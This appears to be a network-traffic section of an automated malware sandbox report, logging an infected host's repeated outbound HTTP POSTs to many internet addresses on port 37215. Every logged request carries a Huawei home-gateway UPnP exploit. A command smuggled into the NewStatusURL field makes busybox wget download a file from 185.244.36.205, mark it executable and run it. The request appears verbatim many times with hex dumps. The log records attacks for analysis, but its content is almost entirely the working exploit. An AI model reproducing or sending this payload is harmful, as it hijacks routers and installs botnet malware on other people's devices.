                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1594192.168.2.1553144121.251.75.20237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645351887 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1595192.168.2.1554074157.10.101.24037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645371914 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1596192.168.2.1560780157.72.141.25537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645380020 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1597192.168.2.154477841.186.126.19437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645411968 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1598192.168.2.1552300122.71.107.15137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645440102 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1599192.168.2.1560754181.252.167.14737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645446062 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1600192.168.2.1553408122.226.50.18437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645447969 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1601192.168.2.155124031.102.115.8637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645478010 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1602192.168.2.1542986186.185.186.25437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645481110 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1603192.168.2.1538692197.103.166.21437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645500898 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1604192.168.2.154873094.102.55.23937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645508051 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
